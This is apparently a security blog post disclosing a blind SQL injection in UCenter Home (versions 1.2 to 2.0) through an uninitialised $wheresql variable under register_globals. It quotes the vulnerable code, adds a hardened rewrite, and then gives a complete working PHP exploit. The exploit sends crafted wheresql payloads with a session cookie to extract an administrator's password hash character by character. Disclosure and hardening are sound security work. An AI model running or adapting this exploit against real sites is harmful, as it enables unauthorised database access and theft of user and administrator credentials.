UCenter Home: a low-value injection spanning three versions

This injection has existed since version 1.2. At the end of 2008, when everyone was widely using version 1.5, I wanted to get into a uchome site, so I read the source and found this spot, wrote a useless exp and left it sitting on my hard drive for over a year without releasing it. A few days ago I looked at version 2.0 and saw it was still there, and I was still asking flyh4t whether to publish it or not. Since xhming has now published it, I'll talk about it too. I guess plenty of big names have had it stashed away as a backup 0day for a long time.

First, why it is low-value. Two reasons:
1. The vulnerability only exists with global variables enabled, i.e. register_globals = On;
2. Given the security of the UCenter product itself, even if you get the password out via injection, how many people can crack it?

Now the vulnerability itself; it is actually easy to spot:

    if($space['friendnum']) { // the user must have at least one friend for this branch to run
        $groups = getfriendgroup();

        $theurl = 'cp.php?ac=friend&op=group';
        $group = !isset($_GET['group'])?'-1':intval($_GET['group']);
        if($group > -1) { // the condition is under the requester's control, and it need not be satisfied
            $wheresql = "AND main.gid='$group'"; // $wheresql is never initialised
            $theurl .= "&group=$group";
        }

        $count = $_SGLOBAL['db']->result($_SGLOBAL['db']->query("SELECT COUNT(*) FROM ".tname('friend')." main
            WHERE main.uid='$space[uid]' AND main.status='1' $wheresql"), 0);
        $query = $_SGLOBAL['db']->query("SELECT main.fuid AS uid,main.fusername AS username, main.gid, main.num FROM ".tname('friend')." main
            WHERE main.uid='$space[uid]' AND main.status='1' $wheresql
            ORDER BY main.dateline DESC
            LIMIT $start,$perpage");
        while ($value = $_SGLOBAL['db']->fetch_array($query)) {
            realname_set($value['uid'], $value['username']);
            $value['group'] = $groups[$value['gid']];
            $list[] = $value;
        }
        $multi = multi($count, $perpage, $page, $theurl);
    }
This is much like the injection vulnerability exposed in ECShop last year, and the exploitation condition is the same: it only works with register_globals = On.

What leaves me speechless is that the programmers never noticed it across all those version upgrades~
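For comparison, here is how the same query construction looks once every variable is initialised before use and the values are bound instead of interpolated. This is an added illustration, not uchome's own code; the function name, its parameters and the placeholder style are assumptions, and the caller is expected to bind the returned parameters with whatever prepared-statement API it uses.

```php
<?php
// Added example (not uchome's code): the friend-group list query from
// cp.php?ac=friend&op=group rebuilt so that a request parameter named
// "wheresql" can no longer reach the SQL text, even with register_globals=On.
// Function, parameter and table names are assumptions.

function build_friend_queries(array $get, int $uid, string $table, int $start, int $perpage): array
{
    // Hardened: $wheresql is always assigned before it is read. The original
    // left it unset, so under register_globals=On a ?wheresql=... parameter
    // became its value whenever 'group' was absent or -1.
    $wheresql = '';
    $params   = [$uid];

    // Same intval() coercion the original applies to 'group'.
    $group = !isset($get['group']) ? -1 : intval($get['group']);
    if ($group > -1) {
        $wheresql = ' AND main.gid = ?';
        $params[] = $group;
    }

    // Placeholders instead of string interpolation; LIMIT values are bound too.
    $count = "SELECT COUNT(*) FROM {$table} main"
           . " WHERE main.uid = ? AND main.status = '1'{$wheresql}";
    $list  = "SELECT main.fuid AS uid, main.fusername AS username, main.gid, main.num"
           . " FROM {$table} main WHERE main.uid = ? AND main.status = '1'{$wheresql}"
           . " ORDER BY main.dateline DESC LIMIT ?, ?";

    return [
        'count'       => $count,
        'list'        => $list,
        'params'      => $params,
        'list_params' => array_merge($params, [$start, $perpage]),
    ];
}

// Constructed request carrying a stray "wheresql" parameter: it is ignored,
// because the function never reads it and the local variable shadows any global.
$q = build_friend_queries(['wheresql' => 'injected text'], 7, 'uchome_friend', 0, 20);
var_dump(strpos($q['count'], 'injected') === false); // bool(true)
var_dump($q['params']);                               // array(1) { [0]=> int(7) }
```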

Exploitation with register_globals on:

1. Register an account, log in and add a friend; at least one friend must exist;

2. Because both SQL statements run, a union select is inconvenient, so blind injection can be used directly. Here is a simple exp:

Silly question: what good does injecting out the password do :)

<?php
print_r('
--------------------------------------------------------------------------------
UChome <=2.0 "wheresql" blind SQL injection/admin credentials disclosure exploit
BY oldjun
--------------------------------------------------------------------------------
');

if ($argc<4) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path uid
host: target server (ip/hostname)
path: path to UChome
uid: uid to UChome
Example:
php '.$argv[0].' localhost / 1
--------------------------------------------------------------------------------
');
die;
}

function sendpacketii($packet)
{
global  $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$uid=$argv[3];
$prefix="cdb_uc_";
$cookie="cdb_sid=UR4dP4; uchome_loginuser=oldjun; uchome_sendmail=1; uchome_auth=2fea%2FFzIOg1fohrxPmoRl9pazueVlMxlY2D%2BT%2BmKUt9fAGyBWuXRk8iq9SbNCM9zQ9rfrnW%2FJ%2BBaq%2BkxpMkp; uchome_synfriend=1; uchome_checkpm=1";//need modify

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}

/*need login*/
$packet ="GET ".$path."cp.php?ac=friend&op=group HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi(chr(196).chr(250).chr(208).chr(232).chr(210).chr(170).chr(207).chr(200).chr(181).chr(199).chr(194).chr(188),$html))
{
die("Login first!");
}

echo "[~]exploting now,plz waiting\r\n";

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$packet ="GET ".$path."cp.php?ac=friend&op=group&wheresql=/**/and/**/1=(select/**/count(*)/**/from/**/".$prefix."members/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/uid=".$uid.") HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//die($html);
if (!eregi(chr(195).chr(187).chr(211).chr(208).chr(207).chr(224).chr(185).chr(216).chr(211).chr(195).chr(187).chr(167),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

print_r('
--------------------------------------------------------------------------------
[+]pwd(md5 32位) -> '.$password.'
--------------------------------------------------------------------------------
');
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
